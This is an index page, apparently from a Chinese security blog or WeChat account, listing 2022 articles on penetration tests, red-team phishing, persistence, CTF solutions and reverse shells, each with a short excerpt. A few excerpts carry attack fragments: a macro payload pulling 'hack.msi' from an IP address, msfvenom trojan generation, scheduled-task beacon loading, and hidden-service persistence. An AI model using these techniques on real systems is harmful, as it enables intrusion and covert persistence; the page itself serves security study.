巡安似海

其他

对某外企的一次内网渗透复盘(三)

“%userprofile%\Recent*.*最后清除在边界机器里上传的工具与脚本并清除日志。From:https://hui-blog.cool/posts/9ef8.html往期推荐
2022年8月4日
其他

对某外企的一次内网渗透复盘(二)

内网信息收集信息收集:当前system权限,只有一个网段192.168.0.0/24,并发现存在域环境:latam.com,当前机器是域内机器。域控主机主域控:ARBUEDCP02$
2022年8月2日
其他

对某外企的一次内网渗透复盘(一)

内网渗透有杀软,做完免杀之后,直接上线CS,进行进程迁移。存在杀软写入注册表,做好权限维持,这里忘记截图了。shell
2022年8月1日
其他

红队常用钓鱼方式收集

http://192.168.169.128:8000/hack.msi")=HALT()右键打开启用宏即可MSF上线From:https://ch1e.gitee.io往期推荐
2022年7月28日
其他

渗透测试如何利用403页面

2007.扫描的时候遇到403了,上目录扫描工具,扫目录,扫文件(记住,扫描的时候要打开探测403,因为有些网站的目录没有权限访问会显示403,但是在这个目录下面的文件,我们或许能扫描到并访问
2022年7月27日
其他

Win 权限维持小思路

来远程加载执行beacon准备计划任务执行的bat脚本update.bat,放到目标机器临时目录下c:\windows\temp\delete.bat[delete.bat]cd
2022年7月26日
其他

浅谈Web安全从SOP到CORS跨域再到CSP

所以很多浏览器默认会直接限制请求,跨域请求可能不是浏览器直接拦截掉了,而是跨站请求发起了,但是返回结果被浏览器拦截了,请求实际上已经发送到了后端服务器,只是无法读取回复而已。但因为安全
2022年7月25日
其他

记一次智慧校园系统一轮游

'http://xxxx-xxx.com/xxxxx/xxxxxxx.do?toTeacherPage&fun=jsxgmm&childs=XXXXXX~9001~xxxxxx~1&flag=1',
2022年7月21日
其他

某2021 CTF复现

t)有一个坑,因为时区原因,从获得的时间反推时间戳的时候需要加8个小时*ctf{Y0u_Are_t3e_Master_of_3he_Time!}
2022年7月20日
其他

某次授权渗透测试小记

C-xxxx打印服务系统未授权访问只要一直点直接打印,打印机就会一直出纸,也可以DIY打印内容,只需要替换框中的内容即可,后来沟通中反馈说打印机除了非常多的纸,部分员工还以为打印机坏了0x03
2022年7月19日
其他

从SQL注入延时盲注到Get Database

?)返回包显示Success,猜测可能语句执行成功,但是没有返回点,故此通过sleep(3)来进行判断可以看到burp提示了3秒钟,尝试修改为5秒确认存在SQL注入Payloadselect
2022年7月15日
其他

一次HTB_Archetype的详细通关过程

\\10.129.151.127密码直接空密码,回车即可可以看到这里共享了四个目录,非管理共享目录的话就是backups了所以任务2的答案是backups任务3:SMB共享文件中标识的密码是什么?
2022年7月14日
其他

外网艰难打点到Linux提权

/usr/share/cleanup/tidyup.sh然后Kali进行监听,因为该脚本为定时执行,我们只需要等待shell弹回来即可
2022年7月12日
自由知乎 自由微博
其他

一次授权的系统渗透测试

结语遵纪守法,不对没有授权的站点进行测试From:https://xz.aliyun.com/t/11451欢迎
2022年7月8日
其他

Yii2 反序列化远程代码执行 POP链

$this->maxRetries变量都可以控制,如果$res可以控制的话那么就可以执行命令了通过这条$res
2022年7月7日
其他

渗透中APK测试小Tip

oss2枚举存储空间:很多时候,你拿到的可能只是一个存储空间的访问地址,而accesskey的访问权限可能更大,这个时候就需要对存储空间进行枚举,看看其他空间是否有权限访问和有自己需要的信息。#
2022年7月6日
其他

针对URL跳转漏洞的经验分享

前言之前盲目于一直挖洞每天技术都没什么增长,多的仅是那么一点点的经验,所以接下来的日子里,都会尽量去接触一些自己的知识盲区来扩大自己的知识面。0x01
2022年7月5日
其他

浅析TomCat Getshell拿服务器权限实战

前言无意中接触到一个网站,所以索性尝试一下,都是一些基本操作,大佬看看就可以了奥。注:由于保密问题,所有关于对方信息网址等各项信息都将保密打上马赛克,能打的都打上马赛克。0x01
2022年7月4日
其他

Linux写入公钥实现免密登录

3|【PyHacker编写指南】爆破一句话密码//
2022年7月1日
其他

利用云函数隐藏Webshell真实IP

【函数配置】里面,最好把执行超时时间设置成和蚁剑里面的超时时间一样或者更长来源:http://www.xpshuai.cn/%E5%88%E5%AE%9EIP.html往期推荐
2022年6月30日
其他

外网勘察到多重内网渗透

shell1.php成功拿到shell当前shell是一个普通权限,但是目标是后面的所有机器,所以这台机器www权限也是可以的,我们把会话派生到msf上,使用msf生成一个木马msfvenom
2022年6月29日
其他

使用安卓模拟器抓取HTTP(S)数据包

ps:如果部分模拟器不支持此后缀安装,可以将其修改为cer后缀再进行安装至此已经完成配置,即可再安卓模拟器中正常抓取https流量0x03
2022年6月28日
其他

熊海CMS1.0代码审计

代码审计之越权访问我们这里先登录到后台,抓一个后台的包包里的cookie有个user=admin
2022年6月27日
其他

某代刷网的一次代码审计

3|【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)//
2022年6月24日
其他

CS流量之终极隐匿

CDN配置文件之使用Profile使用的2.4.3https://github.com/rsmudge/Malleable-C2-Profiles修改Profilehttps-certificate
2022年6月23日
其他

绕过CVE-2019-1040的基于资源委派攻击方法

192.168.4.142同样的通过s4u2self来进行相关的cifs的服务票据,然后通过smbexec来进行命令执行,我这里用windows来进行演示下python
2022年6月22日
其他

Windows Access Token提权详解

Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝。这也就解释了A用户创建一个进程而该进程没有B用户的权限,因为默认打开一个进程都是以自身的令牌去验证启动的。Access
2022年6月20日
其他

某测试端口的.net-Web功能到GetShell

前言项目中碰到了一个端口存在目录遍历,比较运气的是泄漏了ASP.NET的obj目录,最终找到了Web功能模块的DLL,实现了未授权的文件上传GetShell。0x02
2022年6月17日
其他

一次redis未授权写入攻击以及RCE 学习

),因此其实对于一般的服务器来说,绑定自己的外网IP和直接绑定0.0.0.0是没区别的,不设置密码的情况下去绑定外网IP起不到任何的保护作用,返回会因为绑定了地址让保护模式失效遭受攻击。(2)使用
2022年6月16日
其他

配置reGeorg+Proxifier渗透内网

http://:www.xxx.com/tunnel.xxx这个端口就是你所使用的本地代理端口,待会我们将使用
2022年6月15日
其他

Linux反弹shell(一)文件描述符与重定向

(这里所有字符之间不要有空格)说明:1)这里两个都是将文件描述符n复制到m,两者的区别是,前者是以只读的形式打开,后者是以写的形式打开因此0&1是完全等价的(读/写方式打开对其没有任何影响)
2022年6月14日
其他

从钓鱼网站到某大厂存储型XSS

(2)判断点击这个链接的地点是不是在QQ内部,如果不是就会直接跳转到真的QQ空间登录(因为他知道你不在QQ里面没有session之类的就没法在输入密码之后成功登进去,就露馅了)
2022年6月13日
其他

记一次利用sqlmap渗透的经历

对某快捷酒店一次内网测试记一次某山信息泄露+源码泄露getshell记一些linux安全应急排查思路和命令通过修改注册表减少DDoS攻击记一次对钓鱼诈骗网站的渗透测试
2022年6月10日
其他

对某快捷酒店一次内网测试

华为防火墙之类的,我又看了一下445,139端口似乎没有开启的主机。临时想不到什么快捷的方法,时间也不早了,明天一大早还有事,暂且放你一马~~0x04
2022年6月9日
其他

记一次某山信息泄露+源码泄露getshell

记一次绕过安全狗与360艰难提权记一次对钓鱼诈骗网站的渗透测试代码审计VauditDemo程序到exp编写记一些linux安全应急排查思路和命令网鼎杯-青龙组-Web-Wp
2022年6月8日
其他

记一次绕过安全狗与360艰难提权

记一次对钓鱼诈骗网站的渗透测试记一次初学PHP反序列化(总结)绕过CDN查找真实IP通过修改注册表减少DDoS攻击
2022年6月7日
其他

记一次对钓鱼诈骗网站的渗透测试

前言背景一个学长前几天不幸在钓鱼网站中招被骗走一些资金,在联系有关部门前找到了我看看能不能获取到一些有用的信息以便于有关部门行动0x02
2022年6月6日
其他

[CTF记录_强网杯 2019]随便注(三种方法)

handler语句代替select查询:这个方法在GYCTF中本题的升级版(多过滤了prepare、set、rename,显然前两种方法都不适用)中亮相1';handler
2022年6月4日
其他

CTF中basename()绕过小结

filename.在使用默认语言环境设置时,basename()会删除文件名开头的非ASCII字符。测试代码:
2022年6月3日
其他

记一些linux安全应急排查思路和命令

linux常见命令查看系统状态top命令(常用于挖矿应急响应)查看非root运行的进程ps
2022年6月2日
其他

通过修改注册表减少DDoS攻击

做NAT时放大转换的对外端口最大值HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\ParametersMaxUserPort
2022年6月1日
其他

SC实现隐藏Windows服务维持权限

正文(隐藏服务)为了不让管理员发现用于权限维持的服务,通过SDDL修改服务的安全描述符,安全描述符是用来配置该服务允许哪些用户权限访问使用sc程序的sdset模块修改安全描述符sc.exe
2022年5月31日
其他

记一次初学PHP反序列化

4|【PyHacker编写指南】爆破一句话密码
2022年5月28日
其他

实战挖掘某出版社漏洞集合

邮箱系统SQL注入&Getshell&远程代码执行U-mail挺老的邮件系统了,很多洞,经过测试,通过注入into
2022年5月27日
其他

网鼎杯-青龙组-Web-Wp

我们也可以把他反序列化输出看看最后我们复制生成出来的字符串然后接str参数就可以访问到flag.php文件了前端没有,查看源代码成功获取Flag!最后,技术上有你有我,愿我们早日成为大牛!往期推荐
2022年5月26日
其他

Burp半自动时间盲注

4|【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)
2022年5月25日
其他

简单实现程序DLL劫持

前言程序启动会调用固定的.dll文件,通过特定的手法将木马代码和进程注入到可被劫持的DLL文件中,当程序正常启动,我们代码也会秘密执行。0x01
2022年5月24日
其他

【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

得到连接:CSRF:http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE点击链接会自动发表内容我们缩短一下链接
2022年5月23日
其他

(总结)绕过CDN查找真实IP

利用Fofa、Shadon等搜索引擎https://www.fofa.so/https://www.shodan.io/https://censys.io/以fofa为例:
2022年5月22日
其他

【PyHacker编写指南】最终章

经过前几节的文章,不知道小伙伴们有没有跟着写下来,如果写下来肯定会有很大的提升,这里是我之前做的笔记,分享出来给大家做个参考PyHacker系列就到此结束了,喜欢的点个Star吧项目笔记地址:https://github.com/hackxc/Pyhacker
2022年5月21日